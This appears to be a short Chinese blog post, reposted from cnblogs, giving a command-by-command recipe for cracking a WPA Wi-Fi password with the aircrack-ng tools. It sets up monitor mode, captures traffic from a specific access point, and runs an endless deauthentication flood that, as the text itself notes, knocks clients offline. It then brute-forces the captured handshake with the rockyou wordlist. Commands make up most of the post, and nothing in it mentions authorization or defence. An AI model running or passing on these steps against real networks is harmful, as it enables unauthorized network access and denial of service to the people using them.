标签:wifi lists share cap sts ack rdl 模式 冲突
airmon-ng start wlan0
airodump-ng wlan0mon#find the wifi
airodump-ng -w yakoazz -c 1 --bssid BE:5F:F6:97:67:6B wlan0mon#-c is wifi channel, -w is name(any name is ok),-bssis is Mac
解释:–bssid嗅探指定无线AP,后面跟着AP的bssid,如下图
这时候可以等待握手包的获取。
为了加速握手包的获取,我们可以使用aireplay来给AP发送断开包:
aireplay-ng -0 0 -a BE:5F:F6:97:67:6B wlan0mon
解释:-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值,上图可以一目了然。
这时候我们在右上角可以看到WPA handshake字样,后面跟着bssid,即为抓到了该无线网的握手包,我们可以使用CTRL+C来停止嗅探握手包。
aircrack-ng yakoazz-03.cap -w /usr/share/wordlists/rockyou.txt
http://www.vuln.cn/2683
标签:wifi lists share cap sts ack rdl 模式 冲突
原文地址:https://www.cnblogs.com/yakoazz/p/8987896.html